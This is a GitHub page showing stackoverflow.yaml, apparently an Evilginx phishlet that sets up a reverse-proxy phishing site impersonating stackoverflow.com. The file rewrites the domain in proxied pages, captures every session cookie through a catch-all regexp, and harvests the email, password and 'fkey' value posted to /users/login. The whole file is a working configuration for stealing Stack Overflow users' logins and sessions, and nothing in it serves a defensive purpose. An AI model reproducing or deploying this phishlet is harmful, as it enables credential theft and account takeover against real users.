-
Notifications
You must be signed in to change notification settings - Fork 59
/
stackoverflow.yaml
31 lines (31 loc) · 928 Bytes
/
stackoverflow.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
author: '@hash3liZer'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: '', orig_sub: '', domain: 'stackoverflow.com', session: true, is_landing: true, auto_filter: false}
- {phish_sub: 'www', orig_sub: 'www', domain: 'stackoverflow.com', session: true, is_landing: false, auto_filter: false}
sub_filters:
- {triggers_on: 'stackoverflow.com', orig_sub: '', domain: 'stackoverflow.com', search: 'stackoverflow.com', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'text/json']}
auth_tokens:
- domain: 'stackoverflow.com'
keys: ['.*,regexp']
- domain: '.stackoverflow.com'
keys: ['.*,regexp']
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
custom:
- key: 'fkey'
search: '(.*)'
type: 'post'
auth_urls:
- '/'
- '/users/login'
login:
domain: 'stackoverflow.com'
path: '/users/login'